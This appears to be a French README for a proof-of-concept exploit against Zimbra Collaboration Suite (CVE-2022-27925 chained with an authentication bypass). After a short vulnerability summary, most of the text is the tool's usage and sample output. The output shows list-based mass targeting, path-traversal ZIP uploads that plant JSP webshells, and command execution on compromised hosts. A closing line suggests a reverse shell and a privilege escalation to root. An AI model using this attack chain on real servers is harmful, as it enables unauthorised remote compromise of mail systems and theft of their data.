
Zimbra CVE-2022-27925 PoC
Le 10 mai 2022, Zimbra a publié les versions 9.0.0 patch 24 et 8.8.15 patch 31 pour corriger plusieurs vulnérabilités dans Zimbra Collaboration Suite, notamment CVE-2022-27924 (dont nous avons déjà parlé) et CVE-2022-27925.
À l'origine, Zimbra a qualifié CVE-2022-27925 d'attaque par traversée de chemin authentifiée, dans laquelle un utilisateur administratif pouvait écrire des fichiers dans n'importe quel répertoire du système de fichiers sous le compte Zimbra. Comme on pensait au départ qu'il s'agissait d'une attaque réservée aux administrateurs, le NVD lui a attribué un score de base CVSS de 7.8. Plus tard, Volexity a remarqué que les attaquants exploitant cette vulnérabilité avaient trouvé un moyen de contourner les exigences administratives et en a parlé le 10 août 2022. Ce nouveau contournement de l'authentification a reçu un nouvel identifiant – CVE-2022-37042.
En combinant la vulnérabilité d'origine de traversée de chemin et le nouveau contournement de l'authentification, les attaquants peuvent compromettre à distance un système Zimbra Collaboration Suite via le port d'administration (par défaut, 7071) de manière anonyme. Combinées à une vulnérabilité d'élévation de privilèges actuellement non corrigée, dont nous avons récemment parlé et pour laquelle nous avons écrit un exploit, ces trois vulnérabilités permettent l'exécution de commandes à distance en tant qu'utilisateur root sur les systèmes non corrigés.
Bien que les avis publics ne le mentionnent pas, selon notre analyse, Zimbra Collaboration Suite Network Edition (l'édition payante) est vulnérable, contrairement à l'Open Source Edition (gratuite) (car elle ne dispose pas du point de terminaison mboximport vulnérable). Les versions vulnérables sont :
Zimbra Collaboration Suite Network Edition 9.0.0 Patch 23 (and earlier)
Zimbra Collaboration Suite Network Edition 8.8.15 Patch 30 (and earlier)
Ces vulnérabilités (et d'autres dans Zimbra) font l'objet d'exploitations généralisées dans la nature et doivent donc être corrigées ou mises hors ligne dès que possible. Si vous pensez avoir été compromis, Zimbra fournit des étapes pour reconstruire votre serveur Zimbra Collaboration Suite à partir de zéro avec le dernier patch sans perdre de données.
Source: https://attackerkb.com/topics/dSu4KGZiFd/cve-2022-27925/rapid7-analysis
_____ _ __
/__ / (_)___ ___ / /_ _________ _
/ / / / __ `__ \/ __ \/ ___/ __ `/
/ /__/ / / / / / / /_/ / / / /_/ /
/____/_/_/ /_/ /_/_.___/_/ \__,_/
CVE-2022-27925
usage: exploit.py [-h] [-t TARGET] [-l LIST]
options:
-h, --help show this help message and exit
-t TARGET, --target TARGET
URl with protocol HTTPS
-l LIST, --list LIST List of targets
root@root# python exploit.py -t zimbra.example.com
_____ _ __
/__ / (_)___ ___ / /_ _________ _
/ / / / __ `__ \/ __ \/ ___/ __ `/
/ /__/ / / / / / / /_/ / / / /_/ /
/____/_/_/ /_/ /_/_.___/_/ \__,_/
CVE-2022-27925
[!] Testing URL: https://zimbra.example.com
[!] Target is up!
[!] Creating malicious ZIP path: ../../../../mailboxd/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[+] Webshell works!!
[+] WebShell location: https://zimbra.example.com/zimbraAdmin/BQOQBN.jsp
[+] Uname -a output: Linux zimbra.docker 3.10.0-1127.8.2.el7.x86_64 #1 SMP Thu May 7 19:30:37 EDT 2020 x86_64 x86_64 x86_64 GNU/Linux
root@root# python exploit.py -l targets.txt
_____ _ __
/__ / (_)___ ___ / /_ _________ _
/ / / / __ `__ \/ __ \/ ___/ __ `/
/ /__/ / / / / / / /_/ / / / /_/ /
/____/_/_/ /_/ /_/_.___/_/ \__,_/
CVE-2022-27925
[!] Testing URL: https://patched.example.com
[!] Target is up!
[!] Creating malicious ZIP path: ../../../../mailboxd/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[-] Target not vulnerable
[!] Creating malicious ZIP path: ../../../../jetty_base/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[-] Target not vulnerable
[!] Creating malicious ZIP path: ../../../../jetty/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[-] Target not vulnerable
[!] Testing URL: https://zimbra.example.com
[!] Target is up!
[!] Creating malicious ZIP path: ../../../../mailboxd/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[+] Webshell works!!
[+] WebShell location: https://zimbra.example.com/zimbraAdmin/7RRT4G.jsp
[+] Uname -a output: Linux zimbra.docker 3.10.0-1127.8.2.el7.x86_64 #1 SMP Thu May 7 19:30:37 EDT 2020 x86_64 x86_64 x86_64 GNU/Linux
[!] Creating malicious ZIP path: ../../../../jetty_base/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[+] Webshell works!!
[+] WebShell location: https://zimbra.example.com/zimbraAdmin/7RRT4G.jsp
[+] Uname -a output: Linux zimbra.docker 3.10.0-1127.8.2.el7.x86_64 #1 SMP Thu May 7 19:30:37 EDT 2020 x86_64 x86_64 x86_64 GNU/Linux
[!] Creating malicious ZIP path: ../../../../jetty/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[+] Webshell works!!
[+] WebShell location: https://zimbra.example.com/zimbraAdmin/7RRT4G.jsp
[+] Uname -a output: Linux zimbra.docker 3.10.0-1127.8.2.el7.x86_64 #1 SMP Thu May 7 19:30:37 EDT 2020 x86_64 x86_64 x86_64 GNU/Linux
[!] Testing URL: https://patched.example.com
[!] Target is up!
[!] Creating malicious ZIP path: ../../../../mailboxd/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[-] Target not vulnerable
[!] Creating malicious ZIP path: ../../../../jetty_base/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[-] Target not vulnerable
[!] Creating malicious ZIP path: ../../../../jetty/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[-] Target not vulnerable
root@root# .
Pour passer root sur la machine, vous pouvez lancer un reverse shell, puis utiliser le LPE de Slaper